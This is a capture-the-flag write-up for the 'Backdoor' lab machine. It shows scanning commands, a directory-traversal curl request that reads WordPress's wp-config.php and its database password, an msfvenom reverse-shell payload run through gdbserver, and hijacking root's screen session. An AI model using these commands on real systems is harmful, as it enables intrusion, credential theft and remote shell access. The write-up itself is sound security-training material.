nmap -p- -sS -sV         

22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add " backdoor.htb" to /etc/hosts.

First up, checking port 1337 which nmap pick up as waste?. I was unable to pull any information from this service.

Connecting with nc did not send back any information. The same process repeated with Wireshark also showed no information from this port.

As such we will proceed to port 80 which, appears to be running Wordpress as shown below:

Standard enumeration with feroxbuster shows multiple typical WordPress PHP files.

Instead we jump over to wpscan in order to further enumerate the WordPress site. The following command was run to search all available plugins for known exploits.

wpscan --url http://backdoor.htb -t 40 --detection-mode mixed --enumerate ap --plugins-detection aggressive

wpscan soon finds the vulnerable plugin ebook-download which is running version 1.1.

Searchsploit shows a known exploit for eBook Download 1.1 for Directory Traversal.


With the following shown as a PoC:


Testing this against the target system's WordPress site proves successful. We are able to read /wp-settings.php.

curl "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php"

As shown above, this reveals the DB_Password value. I tried to use this against the admin account and the wordpressuser account and was unable to proceed through either the login page or SSH against standard accounts.

From here, further enumeration through LFI will be required. I started ZAP Proxy and sent a manual request through with the Directory Traversal PoC.

We get some interesting LFI results, however none that are of any use to us.

After much further enumeration I decided to search for running processes and their corresponding command lines. This is usually found under /proc/PID/cmdline. Where below the request will start with '1' and then, a number file through to 1000 will be generated using the 'numberzz' module in ZAP Proxy.

As shown below PID 816 shows gdbserver running on pot 1337 which we did not get any results for earlier.

Searchsploit shows this could be vulnerable to RCE.

BookHackTricks has a great page on a few ways to exploit gdbserver.


# Trick shared by @B1n4rySh4d0w
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> PrependFork=true -f elf -o binary.elf

chmod +x binary.elf

gdb binary.elf

# Set remote debuger target
target extended-remote

# Upload elf file
remote put binary.elf binary.elf

# Set remote executable file
set remote exec-file /home/user/binary.elf

# Execute reverse shell executable

Where a shell is caught on our listener.

Metasploit can also be used to exploit gdbserver.

use exploit/multi/gdb/gdb_server_exec

Performing enumeration with we have an interesting find pop up under the running processes and crons section.

Looking at the above parameters we can see the from the screen help output below, that -dmS is used to start a screen daemon then disconnect it. In the case of above as root.

The manual for screen can be found below:

The linked forum post on Serverfault shows how we can identify existing screen sessions.


Looking further on how to connect to other users screen sessions, this forum post from 2006 describes it well:

As we know the root user account is currently running a screen session we can then connect to it. We know the session name from the running processes we found from

screen -x "<host_username>/<sessionname>"
/var/run/screen -x root/root

Which gets us a root shell.

Last updated